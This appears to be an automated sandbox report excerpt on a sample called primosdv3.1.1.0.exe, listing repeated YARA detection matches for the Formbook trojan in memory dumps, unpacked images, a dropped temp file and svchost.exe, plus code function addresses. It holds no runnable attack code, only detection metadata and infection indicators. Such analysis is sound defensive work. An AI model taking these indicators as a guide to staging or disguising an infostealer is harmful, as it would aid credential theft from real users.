Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: bstkiooen.exe PID: 3092, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 4024, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: primosdv3.1.1.0.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: bstkiooen.exe PID: 3092, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 4024, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6848E	0_2_00C6848E
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C76CDC	0_2_00C76CDC
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C640FE	0_2_00C640FE
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C74088	0_2_00C74088
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C700B7	0_2_00C700B7
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C851C9	0_2_00C851C9
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C77153	0_2_00C77153
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C762CA	0_2_00C762CA
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C632F7	0_2_00C632F7
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C743BF	0_2_00C743BF
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C8D440	0_2_00C8D440
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6F461	0_2_00C6F461
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6C426	0_2_00C6C426
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C777EF	0_2_00C777EF
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C8D8EE	0_2_00C8D8EE
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6286B	0_2_00C6286B
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C919F4	0_2_00C919F4
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6E9B7	0_2_00C6E9B7
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C73E0B	0_2_00C73E0B
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6EFE2	0_2_00C6EFE2
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C84F9A	0_2_00C84F9A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 1_2_00BD0227	1_2_00BD0227
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01711D55	2_2_01711D55
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01640D20	2_2_01640D20
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01664120	2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164F900	2_2_0164F900
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165D5E0	2_2_0165D5E0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672581	2_2_01672581
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701002	2_2_01701002
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165841F	2_2_0165841F
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165B090	2_2_0165B090
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167EBB0	2_2_0167EBB0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01666E30	2_2_01666E30
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041DAE4	2_2_0041DAE4
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041E544	2_2_0041E544
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041ED4C	2_2_0041ED4C
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_00402D90	2_2_00402D90
